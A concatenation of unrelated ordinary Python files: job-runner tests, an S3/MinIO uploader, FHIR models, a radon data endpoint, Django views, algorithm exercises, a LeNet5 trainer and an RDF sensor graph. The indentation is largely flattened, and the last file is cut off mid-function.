def test_start_fail(runner, mocker):
mocked = mocker.patch(
'rjm.runners.funcx_slurm_runner.FuncxSlurmRunner.run_function',
return_value=(1, "mocking failure")
)
with pytest.raises(RemoteJobRunnerError):
runner.start("some_path")
assert mocked.call_count == 1
def test_start_succeed(runner, mocker):
mocked = mocker.patch(
'rjm.runners.funcx_slurm_runner.FuncxSlurmRunner.run_function',
return_value=(0, "Submitted batch job 1234567"),
)
started = runner.start("some/path")
    mocked.assert_called_once()
assert started is True
assert runner._jobid == '1234567'
def test_wait_fail(runner, mocker):
runner._jobid = '123456'
mocked = mocker.patch(
'rjm.runners.funcx_slurm_runner.FuncxSlurmRunner.run_function',
return_value=(1, "mocking failure")
)
with pytest.raises(RemoteJobRunnerError):
runner.wait()
assert mocked.call_count == 1
def test_wait_succeed(runner, mocker):
mocked_sleep = mocker.patch('time.sleep')
runner._jobid = '123456'
mocked = mocker.patch(
'rjm.runners.funcx_slurm_runner.FuncxSlurmRunner.run_function',
side_effect=[
(0, "PENDING"),
(0, "RUNNING"),
(0, "COMPLETED"),
],
)
completed = runner.wait()
assert mocked.call_count == 3
assert completed is True
assert mocked_sleep.call_count == 2
def test_calculate_checksums(runner, tmpdir):
text = """test file with some text"""
expected = "337de094ee88f1bc965a97e1d6767f51a06fd1e6e679664625ff68546e3d2601"
test_file = "testchecksum.txt"
test_file_not_exist = "notexist.txt"
with open(os.path.join(tmpdir, test_file), "w") as fh:
fh.write(text)
returncode, checksums = funcx_slurm_runner._calculate_checksums(
[test_file, test_file_not_exist],
str(tmpdir),
)
assert returncode == 0
assert checksums[test_file] == expected
assert checksums[test_file_not_exist] is None
|
from dagster import (
Output,
InputDefinition,
OutputDefinition,
solid,
pipeline,
List as DagsterList,
String,
)
from dagster_aws.s3 import S3Coordinate
from os import walk
from dotenv import load_dotenv
import boto3
import ntpath
import os
load_dotenv()
@solid(
name="uploadObjectToS3",
description="""
**Uploads the dump files to S3 Server**
### Authors
stejul <https://github.com/stejul>
""",
input_defs=[
InputDefinition(name="local_files", dagster_type=DagsterList[String]),
InputDefinition(name="s3_coordinate", dagster_type=S3Coordinate),
],
output_defs=[OutputDefinition(dagster_type=S3Coordinate)],
)
def upload_to_s3(
context, local_files: DagsterList[String], s3_coordinate: S3Coordinate
) -> S3Coordinate:
s3 = boto3.client(
service_name="s3",
endpoint_url="http://localhost:9000",
aws_access_key_id=os.getenv("MINIO_USER"),
aws_secret_access_key=os.getenv("MINIO_PASSWORD"),
)
s3Resource = boto3.resource(
service_name="s3",
endpoint_url="http://localhost:9000",
aws_access_key_id=os.getenv("MINIO_USER"),
aws_secret_access_key=os.getenv("MINIO_PASSWORD"),
)
return_s3_coordinate: S3Coordinate = {"bucket": s3_coordinate["bucket"]}
for file in local_files:
head, tail = ntpath.split(file)
return_s3_coordinate["key"] = s3_coordinate["key"] + "/" + tail
if s3Resource.Bucket(return_s3_coordinate["bucket"]).creation_date is None:
s3.create_bucket(Bucket=return_s3_coordinate["bucket"])
s3.upload_file(
Filename=f"{head}/{tail}",
Bucket=return_s3_coordinate["bucket"],
Key=return_s3_coordinate["key"],
)
context.log.info(f"Uploaded successfully - {file}")
return Output(return_s3_coordinate)
@solid(
name="getListOfFiles",
description="""
Checks the data directory and returns a list of files
""",
output_defs=[OutputDefinition(dagster_type=DagsterList[String])],
)
def get_all_csv_files(context, info_scraper) -> DagsterList[String]:
context.log.info(f"Info dump is available {info_scraper}")
result: DagsterList[String] = []
    for (dirpath, dirnames, filenames) in walk("src/data/"):
        for file in filenames:
            context.log.info(f"Found following file in directory: {os.path.join(dirpath, file)}")
            result.append(os.path.join(dirpath, file))
return result
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.0.1-9346c8cc45 (http://hl7.org/fhir/StructureDefinition/BiologicallyDerivedProduct) on 2020-02-03.
# 2020, SMART Health IT.
import sys
from dataclasses import dataclass, field
from typing import ClassVar, Optional, List
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .identifier import Identifier
from .period import Period
@dataclass
class BiologicallyDerivedProductCollection(BackboneElement):
""" How this product was collected.
"""
resource_type: ClassVar[str] = "BiologicallyDerivedProductCollection"
collector: Optional[FHIRReference] = None
source: Optional[FHIRReference] = None
collectedDateTime: Optional[FHIRDate] = field(default=None, metadata=dict(one_of_many='collected',))
collectedPeriod: Optional[Period] = field(default=None, metadata=dict(one_of_many='collected',))
@dataclass
class BiologicallyDerivedProductProcessing(BackboneElement):
""" Any processing of the product during collection.
Any processing of the product during collection that does not change the
fundamental nature of the product. For example adding anti-coagulants
during the collection of Peripheral Blood Stem Cells.
"""
resource_type: ClassVar[str] = "BiologicallyDerivedProductProcessing"
description: Optional[str] = None
procedure: Optional[CodeableConcept] = None
additive: Optional[FHIRReference] = None
timeDateTime: Optional[FHIRDate] = field(default=None, metadata=dict(one_of_many='time',))
timePeriod: Optional[Period] = field(default=None, metadata=dict(one_of_many='time',))
@dataclass
class BiologicallyDerivedProductManipulation(BackboneElement):
""" Any manipulation of product post-collection.
Any manipulation of product post-collection that is intended to alter the
product. For example a buffy-coat enrichment or CD8 reduction of
Peripheral Blood Stem Cells to make it more suitable for infusion.
"""
resource_type: ClassVar[str] = "BiologicallyDerivedProductManipulation"
description: Optional[str] = None
timeDateTime: Optional[FHIRDate] = field(default=None, metadata=dict(one_of_many='time',))
timePeriod: Optional[Period] = field(default=None, metadata=dict(one_of_many='time',))
@dataclass
class BiologicallyDerivedProductStorage(BackboneElement):
""" Product storage.
"""
resource_type: ClassVar[str] = "BiologicallyDerivedProductStorage"
description: Optional[str] = None
temperature: Optional[float] = None
scale: Optional[str] = None
duration: Optional[Period] = None
@dataclass
class BiologicallyDerivedProduct(DomainResource):
""" A material substance originating from a biological entity.
A material substance originating from a biological entity intended to be
transplanted or infused
into another (possibly the same) biological entity.
"""
resource_type: ClassVar[str] = "BiologicallyDerivedProduct"
identifier: Optional[List[Identifier]] = None
productCategory: Optional[str] = None
productCode: Optional[CodeableConcept] = None
status: Optional[str] = None
request: Optional[List[FHIRReference]] = None
quantity: Optional[int] = None
parent: Optional[List[FHIRReference]] = None
collection: Optional[BiologicallyDerivedProductCollection] = None
processing: Optional[List[BiologicallyDerivedProductProcessing]] = None
manipulation: Optional[BiologicallyDerivedProductManipulation] = None
storage: Optional[List[BiologicallyDerivedProductStorage]] = None
|
import logging
from eposfederator.libs.base.requesthandler import RequestHandler
from eposfederator.libs import downloader, serviceindex
from eposfederator.libs.base.schema import Schema
import tornado.iostream
from marshmallow import fields, validate
from webargs.tornadoparser import use_args
from shapely import geometry
import urllib
logger = logging.getLogger(__name__)
class RequestSchema(Schema):
class Meta():
dateformat = '%Y-%m-%dT%H:%M:%S.%fZ'
strict = True
mintime = fields.DateTime(
required=True,
metadata={
"label": "Minimum time"
},
description="Start data selection from this UTC datetime"
)
maxtime = fields.DateTime(
required=True,
metadata={
"label": "Maximum time"
},
description="End data selection at this UTC datetime"
)
maxlat = fields.Float(
validate=validate.Range(max=90, min=-90),
required=True,
metadata={
"label": "Maximum latitude"
},
description="Maximum latitude"
)
minlat = fields.Float(
validate=validate.Range(max=90, min=-90),
required=True,
metadata={
"label": "Minimum latitude"
},
description="Minimum latitude"
)
maxlon = fields.Float(
validate=validate.Range(max=180, min=-180),
required=True,
metadata={
"label": "Maximum longitude"
},
description="Maximum longitude"
)
minlon = fields.Float(
validate=validate.Range(max=180, min=-180),
required=True,
metadata={
"label": "Minimum longitude"
},
description="Minimum longitude"
)
minperiod = fields.Float(
required=False,
metadata={
"label": 'Minimum "sampling period" allowed to extract data [minutes]'
}
)
maxperiod = fields.Float(
required=False,
metadata={
"label": 'Maximum "sampling period" allowed to extract data [minutes]'
},
)
type_site = fields.String(
validate=validate.OneOf(["indoor", "shelter", "borehole", "soil"]),
default="indoor",
metadata={
"label": "Nickname of type of installation"
}
)
max_radon_err = fields.Float(
required=False,
        validate=validate.Range(min=-180, max=180),
metadata={
"label": 'maximum % uncertainty of the measure accepted for extraction'
},
)
max_int_delta = fields.Float(
required=False,
validate=validate.Range(min=0),
metadata={
"label": 'maximum distance in time between internal temperature'
},
)
class Handler(RequestHandler):
ID = 'query'
DESCRIPTION = 'Federated Radon counts endpoint'
RESPONSE_TYPE = 'application/json'
REQUEST_SCHEMA = RequestSchema
ROUTE = ""
@use_args(RequestSchema)
async def get(self, reqargs):
try:
# attempt to define the geographic area for this query
bounds = geometry.Polygon([
(reqargs['minlon'], reqargs['minlat']), (reqargs['maxlon'], reqargs['minlat']),
(reqargs['maxlon'], reqargs['maxlat']), (reqargs['minlon'], reqargs['maxlat'])
])
except Exception as e:
bounds = None
reqargs['mintime'] = reqargs['mintime'].strftime('%Y-%m-%dT%H:%M:%S.000Z')
reqargs['maxtime'] = reqargs['maxtime'].strftime('%Y-%m-%dT%H:%M:%S.000Z')
args = urllib.parse.urlencode(reqargs, safe=':')
def ffunc(wspointer):
logger.info(f"filter_func is filtering {wspointer}")
logger.info(self.__class__)
return wspointer.handler == self.__class__
urls = serviceindex.get(geometry=bounds, filter_func=ffunc)
urls = [f"{url.url}?{args}" for url in urls]
self.write('{"results": [')
dlmgr = None
try:
# ask a dload manager to perform the downloads for us
# and store the download errors
dlmgr = downloader.DownloadManager(*urls)
async for chunk in dlmgr.fetch():
self.write(chunk)
await self.flush()
except tornado.iostream.StreamClosedError:
logger.warning("Client left. Aborting download from upstream.")
return
if dlmgr is not None and len(dlmgr.errors) > 0:
self.write('], "errors":[')
self.write(','.join(err.to_json() for err in dlmgr.errors))
self.write(']}')
await self.flush()
|
# @Title: 打印从1到最大的n位数 (打印从1到最大的n位数 LCOF)
# @Author: 18015528893
# @Date: 2021-01-17 18:57:24
# @Runtime: 44 ms
# @Memory: 20.2 MB
from typing import List
class Solution:
def printNumbers(self, n: int) -> List[int]:
return list(range(1, 10 ** n))
|
from events.models import Event, SourceArchive
from dateutil.rrule import *
from common.utils import set_eastern_timezone
import icalendar
import datetime
def process_ical(source):
print("Processing ical: " + source.name)
if source.name == "OPM Holidays":
print("Deleting existing OPM Holidays")
Event.objects.filter(sourceName=source.name).delete()
cal = icalendar.Calendar.from_ical(source.content)
for vevent in cal.walk('vevent'):
summary = (vevent.get('summary'),"")[not vevent.get('summary')]
description = (vevent.get('description'), "")[not vevent.get('description')]
location = (vevent.get('location'), "")[not vevent.get('location')]
allDay = True if isinstance(vevent.get('dtstart').dt, datetime.date) else False
startdate = set_eastern_timezone(vevent.get('dtstart').dt)
enddate = set_eastern_timezone(vevent.get('dtend').dt)
eventId = (vevent.get('uid'),"")[not vevent.get('uid')]
if vevent.get('rrule'):
reoccur = vevent.get('rrule').to_ical().decode('utf-8')
print("Recurring event detected, not supported yet")
else:
className = "event-opm" if source.name == "OPM Holidays" else "event-house-majority-leader"
chamber = "house" if source.name == "House Majority Leader" else ""
existingEvent = False
try:
existingEvent = Event.objects.get(sourceName=source.name, eventId=eventId)
            except Event.DoesNotExist:
existingEvent = False
if existingEvent:
#print("Updating event: " + eventId)
existingEvent.sourceId=source.id
existingEvent.title=summary
existingEvent.description=description
existingEvent.notes=location
existingEvent.allDay=allDay
existingEvent.className=className
existingEvent.start=startdate
existingEvent.end=enddate
existingEvent.chamber=chamber
existingEvent.save(update_fields=['sourceId',
'title',
'description',
'notes',
'allDay',
'className',
'start',
'end',
'chamber'])
else:
#print("Creating event: " + eventId)
Event.objects.create(
sourceName=source.name,
sourceId=source.id,
eventId=eventId,
title=summary,
description=description,
notes=location,
allDay=allDay,
className=className,
start=startdate,
end=enddate,
chamber=chamber)
print("End processing ical: " + source.name)
return
|
# Uses python3
def edit_distance(seq_a, seq_b):
'''Compute the edit distance between two strings.
The edit distance between two strings is the minimum number of operations
(insertions, deletions, and substitutions of symbols) to transform
one string into another. It is a measure of similarity of two strings.'''
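    # Worked example: edit_distance("kitten", "sitting") == 3
    # (substitute 'k'->'s', substitute 'e'->'i', insert 'g').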
    # 2D table with len(seq_b) + 1 columns (width) and len(seq_a) + 1 rows (height)
table = [[float('inf')] * (len(seq_b) + 1) for _ in range(len(seq_a) + 1)]
# Fill the first column of each row with 'a' indices
for y in range(len(seq_a) + 1):
table[y][0] = y
    # Fill the first row (one entry per column) with 'b' indices
for x in range(len(seq_b) + 1):
table[0][x] = x
# Fill the table row by row with the minimum value possible for each node
for y in range(1, len(seq_a) + 1):
for x in range(1, len(seq_b) + 1):
if seq_a[y - 1] == seq_b[x - 1]: # indices start in 0 not in 1
diff = 0 # Match
else:
diff = 1 # Mismatch
# Deletion, Insertion, either Match(1) or Mismatch(0)
table[y][x] = min(table[y - 1][x] + 1, table[y][x - 1] + 1, table[y - 1][x - 1] + diff)
return table[len(seq_a)][len(seq_b)] # Node with optimal alignment (Lower right corner)
if __name__ == "__main__":
print(edit_distance(input(), input()))
|
from __future__ import absolute_import, division, print_function
from stripe import util
from stripe.api_resources.abstract import UpdateableAPIResource
from stripe.api_resources.transfer import Transfer
from stripe.six.moves.urllib.parse import quote_plus
class Reversal(UpdateableAPIResource):
OBJECT_NAME = "transfer_reversal"
def instance_url(self):
token = util.utf8(self.id)
transfer = util.utf8(self.transfer)
base = Transfer.class_url()
cust_extn = quote_plus(transfer)
extn = quote_plus(token)
return "%s/%s/reversals/%s" % (base, cust_extn, extn)
@classmethod
def modify(cls, sid, **params):
raise NotImplementedError(
"Can't modify a reversal without a transfer"
"ID. Call save on transfer.reversals.retrieve('reversal_id')"
)
@classmethod
def retrieve(cls, id, api_key=None, **params):
raise NotImplementedError(
"Can't retrieve a reversal without a transfer"
"ID. Use transfer.reversals.retrieve('reversal_id')"
)
|
"""
:platform: Unix, Windows
:synopsis: This is a minimal examples of the provided class StaircaseGenerator
.. moduleauthor:: Aron Heck
"""
from staircase_number_generator import StaircaseGenerator
def main():
"""
    Asks for a lower and an upper bound, generates the staircase numbers in that range, and prints them
"""
lower_bound = int(input("Enter lower bound of number range as integer decimal:"))
upper_bound = int(input("Enter upper bound of number range as integer decimal:"))
staircase = StaircaseGenerator(lower_bound, upper_bound)
staircase.generate_staircase_from_lower_to_upper_bound()
staircase.print_generated_numbers()
if __name__ == "__main__":
main()
|
from django.views.generic import ListView, DetailView, CreateView, \
DeleteView, UpdateView, \
ArchiveIndexView, DateDetailView, \
DayArchiveView, MonthArchiveView, \
TodayArchiveView, WeekArchiveView, \
YearArchiveView
from teacher.models import Teacher_professional
class Teacher_professionalView(object):
model = Teacher_professional
def get_template_names(self):
"""Nest templates within teacher_professional directory."""
tpl = super(Teacher_professionalView, self).get_template_names()[0]
app = self.model._meta.app_label
mdl = 'teacher_professional'
#self.template_name = tpl.replace(app, '{0}/{1}'.format(app, mdl))
self.template_name = tpl[:8]+'teacher_professional/'+tpl[8:]
return [self.template_name]
class Teacher_professionalDateView(Teacher_professionalView):
date_field = 'timestamp'
month_format = '%m'
class Teacher_professionalBaseListView(Teacher_professionalView):
paginate_by = 10
class Teacher_professionalArchiveIndexView(
Teacher_professionalDateView, Teacher_professionalBaseListView, ArchiveIndexView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalCreateView(Teacher_professionalView, CreateView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalDateDetailView(Teacher_professionalDateView, DateDetailView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalDayArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, DayArchiveView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalDeleteView(Teacher_professionalView, DeleteView):
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalDetailView(Teacher_professionalView, DetailView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalListView(Teacher_professionalBaseListView, ListView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalMonthArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, MonthArchiveView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalTodayArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, TodayArchiveView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalUpdateView(Teacher_professionalView, UpdateView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalWeekArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, WeekArchiveView):
pass
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
class Teacher_professionalYearArchiveView(
Teacher_professionalDateView, Teacher_professionalBaseListView, YearArchiveView):
make_object_list = True
def get_success_url(self):
from django.core.urlresolvers import reverse
return reverse('teacher_teacher_professional_list')
|
from djitellopy import tello
from time import sleep
import cv2
skynet = tello.Tello()
skynet.connect()
print(skynet.get_battery())
skynet.streamon()
while True:
img = skynet.get_frame_read().frame
#img = cv2.resize(img, (360, 240))
cv2.imshow("Image", img)
cv2.waitKey(1)
|
import time
import math
import sys
def BranchAndBound(graph, vertices, cutoff_time, num_edge):
start_time = time.time()
current_best = vertices
uppper_bound = len(graph)
trace = []
    # large graphs hit "RecursionError: maximum recursion depth exceeded in comparison",
    # so raise the recursion limit if needed
if sys.getrecursionlimit() < uppper_bound:
sys.setrecursionlimit(uppper_bound + 2)
def backtracking(cover, cover_num, subgraph, subgraph_num_edge):
if time.time() - start_time > cutoff_time:
# timeout
return
nonlocal current_best, trace, uppper_bound
# if there is no edge on current subgraph, there will search until status
if subgraph_num_edge == 0:
if len(cover) < uppper_bound:
cost = time.time() - start_time
current_best = [k for k, v in cover.items() if v]
print(len(current_best), cost)
uppper_bound = len(current_best)
trace.append(str(cost) + ' ' + str(uppper_bound))
return
# vertex <- findHighestUncoveredDegree
vertex, max_degree = findHighestUncoveredDegree(graph, cover)
if max_degree is None:
# all vertices selected
return
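        # Lower bound: every additional vertex can cover at most max_degree of the
        # remaining edges, so at least ceil(remaining_edges / max_degree) more
        # vertices are needed to complete the cover.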
lb = math.ceil(subgraph_num_edge / max_degree)
if cover_num + lb >= uppper_bound:
# if current_used_vertex + lb >= current_best then pruning
return
# vertex is used
cover[vertex] = True
edges = subgraph[vertex]
# remove the edge of the vertex
for neighbor in edges:
subgraph[neighbor].remove(vertex)
del subgraph[vertex]
# backtracking
backtracking(cover, cover_num + 1, subgraph, subgraph_num_edge - len(edges))
# vertex is unused
        # if this vertex is not chosen, every vertex adjacent to it must be chosen,
        # otherwise its incident edges would remain uncovered
new_cover = cover.copy()
new_cover[vertex] = False
for neighbor in edges:
new_cover[neighbor] = True
new_cover_num = len([k for k, v in new_cover.items() if v])
# backtracking
backtracking(new_cover, new_cover_num, subgraph, subgraph_num_edge - len(edges))
# restore the edge of subgraph
subgraph[vertex] = edges
for neighbor in edges:
subgraph[neighbor].add(vertex)
del cover[vertex]
# put the vertex connected to k into set so that we can modify on backtracking
graph = {k: set([int(i) for i in v]) for k, v in graph.items()}
backtracking({}, 0, graph, num_edge)
return current_best, trace
def findHighestUncoveredDegree(graph, cover):
'''
find the maximum degree of vertex that has not been covered
'''
best_vertex, max_degree = None, None
for k, v in graph.items():
if k not in cover and len(v) > 0:
if max_degree is None or max_degree < len(v):
max_degree = len(v)
best_vertex = k
return best_vertex, max_degree
'''
def readfile(filename):
with open(filename, "r") as f:
first_line = f.readline()
num_vertrix = int(first_line.split(" ")[0])
num_edge = int(first_line.split(" ")[1])
weight = int(first_line.split(" ")[2])
graph = defaultdict(list)
vertices = set()
index = 1
for line in f:
l = line.split(" ")
for i in l:
if i !='\n':
graph[index].append(i)
vertices.add(i)
index += 1
return graph,vertices
graph, vertices = readfile('../DATA/football.graph')
sol, trace = BranchAndBound(graph,vertices, 3)
'''
|
import os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
from collections import Counter
from geo.data_paths import train
from geo.data_paths import species_occurences
from geo.preprocessing.preprocessing import create_trainset
def _create():
create_trainset()
csv = pd.read_csv(train)
#print("Count of different species:", data.species_count)
species_values = csv["species_glc_id"].values
counter = Counter(species_values)
countRows = len(csv.index)
names = []
occurences = []
percents = []
for item, c in counter.most_common():
names.append(item)
occurences.append(int(c))
percents.append(c / countRows * 100)
resulting_rows = list(zip(names, occurences, percents))
results_array = np.asarray(resulting_rows) #list to array to add to the dataframe as a new column
result_ser = pd.DataFrame(results_array, columns=["species", "occurences", "percents"])
result_ser.to_csv(species_occurences, index=False)
print(species_occurences)
#519 species have >= 100 occurences
#986 species have < 10 occurences
def load_species_occurences():
assert os.path.exists(species_occurences)
return pd.read_csv(species_occurences)
def extract_species_occurences():
if not os.path.exists(species_occurences):
_create()
else:
print("Species occurences already saved.")
if __name__ == '__main__':
_create()
|
import torch
import torch.cuda
import torch.nn as nn
import torch.optim as optim
import random
import numpy as np
import sklearn.metrics
import time
import logging
import json
from src.utils.utils import print_progessbar
class LeNet5_trainer:
"""
    Trainer of the LeNet5 architecture.
"""
def __init__(self, net, n_epoch=100, batch_size=128, num_workers=0, lr=1e-3,
lr_decay=0.95, device='cpu', optimizer=None, loss_fn=None,
seed=-1):
"""
        Build a LeNet5 trainer. It enables training and evaluating a LeNet5 architecture.
"""
# set seed for reproducibility
if seed != -1:
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic=True
torch.backends.cudnn.benchmark = False
self.seed = seed
        # Training parameters
self.device = device
self.net = net.to(self.device)
self.n_epoch = n_epoch
self.batch_size = batch_size
self.num_workers = num_workers
self.lr = lr
self.lr_decay = lr_decay
if optimizer == 'Adam':
self.optimizer = optim.Adam(self.net.parameters(), lr=self.lr)
elif optimizer == 'SGD':
self.optimizer = optim.SGD(self.net.parameters(), lr=self.lr)
else:
raise ValueError('Only Adam and SGD are supported.')
self.scheduler = optim.lr_scheduler.MultiplicativeLR(self.optimizer, lr_lambda=lambda ep: self.lr_decay) # manage the change in learning rate
self.loss_fn = nn.CrossEntropyLoss() if loss_fn is None else loss_fn
# Outputs
self.train_acc = None
self.test_acc = None
self.test_pred = None
self.train_time = None
self.epoch_loss_list = []
def train(self, train_dataset, test_dataset):
"""
Train the LeNet5 on the provided dataset.
"""
logger = logging.getLogger()
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=self.batch_size,
num_workers=self.num_workers)
n_batch = len(train_loader)
logger.info(f'>>> Start Training the LeNet5 with seed {self.seed}.')
start_time = time.time()
for epoch in range(self.n_epoch):
epoch_start_time = time.time()
epoch_loss = 0.0
# minibatch iteration
for b, (train_input, train_label, _) in enumerate(train_loader):
train_input = train_input.float().to(self.device)
                train_input.requires_grad = True
train_label = train_label.to(self.device)
# update weight by backpropagation
pred = self.net(train_input)
loss = self.loss_fn(pred, train_label)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
epoch_loss += loss.item()
print_progessbar(b, n_batch, Name='Train Batch', Size=40, erase=True)
# evaluate on test set
test_acc, _ = self.evaluate(test_dataset, last=False)
# store epoch stat
self.epoch_loss_list.append([epoch+1, epoch_loss / n_batch, test_acc])
# print summary statistics
logger.info(f'>>> | Epoch {epoch+1:03}/{self.n_epoch:03} '
f'| Loss {epoch_loss / n_batch:.7f} '
f'| Test Accuracy {test_acc:.3%} '
f'| Time {time.time() - epoch_start_time:.2f} [s] |')
            # update learning rate
self.scheduler.step()
# Get results
self.train_time = time.time() - start_time
self.train_acc, _ = self.evaluate(train_dataset, last=False)
logger.info(f'>>> Finished training of LeNet5')
logger.info(f'>>> Train time {self.train_time:.0f} [s]')
logger.info(f'>>> Train accuracy {self.train_acc:.3%}\n')
def evaluate(self, dataset, last=True):
"""
        Evaluate the network on the provided dataset and return the accuracy score.
"""
if last:
logger = logging.getLogger()
logger.info('>>> Start Evaluating the LeNet5.')
loader = torch.utils.data.DataLoader(dataset, batch_size=self.batch_size,
num_workers=self.num_workers)
N = len(loader)
with torch.no_grad():
pred, label, index = [], [], []
for b, (input_data, input_label, idx) in enumerate(loader):
input_data = input_data.float().to(self.device)
input_label = input_label.to(self.device)
idx = idx.to(self.device)
# classify sample
pred += self.net(input_data).argmax(dim=1).tolist()
label += input_label.tolist()
index += idx.tolist()
print_progessbar(b, N, Name='Evaluation Batch', Size=40, erase=True)
# compute accuracy
acc = sklearn.metrics.accuracy_score(label, pred)
if last:
self.test_acc, self.test_pred = acc, (index, label, pred)
logger.info(f'>>> Test accuracy {self.test_acc:.3%} \n')
else:
return acc, pred
def save_model(self, export_path):
"""
save the model at the given path.
"""
torch.save({'net_dict': self.net.state_dict()}, export_path)
def load_model(self, import_path, map_location='cuda'):
"""
Load a model from the given file.
"""
model = torch.load(import_path, map_location=map_location)
self.net.load_state_dict(model['net_dict'])
def save_results(self, export_path):
"""
Save the results on a JSON.
"""
results = {'train_time': self.train_time,
'loss': self.epoch_loss_list,
'train_acc': self.train_acc,
'test_acc': self.test_acc,
'test_pred': self.test_pred}
with open(export_path, 'w') as fb:
json.dump(results, fb)
|
from django.apps import AppConfig
from django.utils.importlib import import_module
class OffersConfig(AppConfig):
name = 'commercia.offers'
verbose_name = "Offers"
def ready(self):
import_module('commercia.offers.collections')
import_module('commercia.offers.signals')
|
from datetime import datetime
import pytz
import settings
from ical_importer import iCalParser
if __name__ == "__main__":
""" Script that instantiates an iCalParser class and imports the Sessions into Guidebook """
demo_day = datetime(2017, 11, 17, 0, 0, 0, 0, pytz.UTC) # iCalParser allows you to simulate the "day" the parser is being run at. Needed for demo
ical_parser = iCalParser(gb_api_key=settings.GB_API_KEY, guide_id=settings.GUIDE_ID, today=demo_day)
    print('Importing Sessions into Guide {}'.format(settings.GUIDE_ID))
with open("sample_ical.ics") as ical_file:
ical_parser.parse(ical_file)
|
from os import write
import paho.mqtt.client as mqtt # pip install paho.mqtt
import time
import datetime
from rdflib import Graph, URIRef, BNode, Literal, Namespace
from rdflib.namespace import RDF, RDFS, XSD, SOSA, TIME
import numpy as np
g = Graph()
BASE = Namespace("http://example.org/data/")
QUDT11 = Namespace("http://qudt.org/1.1/schema/qudt#")
QUDTU11 = Namespace("http://qudt.org/1.1/vocab/unit#")
CDT = Namespace("http://w3id.org/lindt/custom_datatypes#")
g.bind('rdf', RDF)
g.bind('rdfs', RDFS)
g.bind('xsd', XSD)
g.bind('sosa', SOSA)
g.bind('time', TIME)
g.bind('qudt-1-1', QUDT11)
g.bind('qudt-unit-1-1', QUDTU11)
g.bind('cdt', CDT)
##### Ressources #####
# earthAtmosphere ressources
earthAtmosphere = URIRef('earthAtmosphere')
earthAtmosphere_label = Literal("Atmosphere of Earth", lang="en")
# Iphone ressources
iphone7 = URIRef('iphone7/35-207306-844818-0')
iphone7_label = Literal("IPhone 7 - IMEI 35-207306-844818-0", lang="en")
iphone7_comment = Literal("IPhone 7 - IMEI 35-207306-844818-0 - John Doe", lang="en")
# sensor ressources
sensor = URIRef('sensor/35-207306-844818-0/BMP282')
sensor_obs = URIRef('sensor/35-207306-844818-0/BMP282/atmosphericPressure')
sensor_label = Literal("Bosch Sensortec BMP282", lang="en")
# Observation 346345 ressources
observation_346345 = URIRef('Observation/346345')
###################
##### RDF Triples #####
# earthAtmosphere
g.add((earthAtmosphere, RDF.type, SOSA.FeatureOfInterest))
g.add((earthAtmosphere, RDFS.label, earthAtmosphere_label))
# iphone 7
g.add((iphone7, RDF.type, SOSA.Platform))
g.add((iphone7, RDFS.label, iphone7_label))
g.add((iphone7, RDFS.comment, iphone7_comment))
g.add((iphone7, SOSA.hosts, sensor))
# sensor
g.add((sensor, RDF.type, SOSA.Sensor))
g.add((sensor, RDFS.label, sensor_label))
g.add((sensor, SOSA.observes, sensor_obs))
# Observation 346345
g.add((observation_346345, RDF.type, SOSA.Observation))
g.add((observation_346345, SOSA.observedProperty, sensor_obs))
g.add((observation_346345, SOSA.hasFeatureOfInterest, earthAtmosphere))
g.add((observation_346345, SOSA.madeBySensor, sensor))
observation_346345_result = BNode()
g.add((observation_346345, SOSA.hasResult, observation_346345_result))
g.add((observation_346345_result, RDF.type, QUDT11.QuantityValue))
g.add((observation_346345_result, QUDT11.numericValue, Literal("101936", datatype=XSD.double)))
g.add((observation_346345_result, QUDT11.unit, QUDTU11.Pascal))
observation_346345_resultTime = BNode()
g.add((observation_346345, SOSA.resultTime, observation_346345_resultTime))
g.add((observation_346345_resultTime, RDF.type, TIME.Instant))
g.add((observation_346345_resultTime, TIME.inXSDDateTimeStamp, Literal("2017-06-06T12:36:13+00:00", datatype=XSD.dateTimeStamp)))
########################
def print_graph(gg):
print(gg.serialize(format='ttl', base=BASE).decode('u8'))
########################
def on_message(client, userdata, message):
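    # The payload is expected to be "<reading>|<timestamp>" (e.g. "101.3 kPa|2021-05-01T12:00:00",
    # an illustrative value), matching the split on '|' below.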
[reading, dt] = message.payload.decode('utf-8').split('|')
new_obs = URIRef("Observation/" + str(on_message.id))
on_message.id += 1
print("Message received")
g.add((new_obs, RDF.type, SOSA.Observation))
g.add((new_obs, SOSA.observedProperty, sensor_obs))
g.add((new_obs, SOSA.hasFeatureOfInterest, earthAtmosphere))
g.add((new_obs, SOSA.madeBySensor, sensor))
g.add((new_obs, SOSA.hasSimpleResult, Literal(reading, datatype=CDT.ucum)))
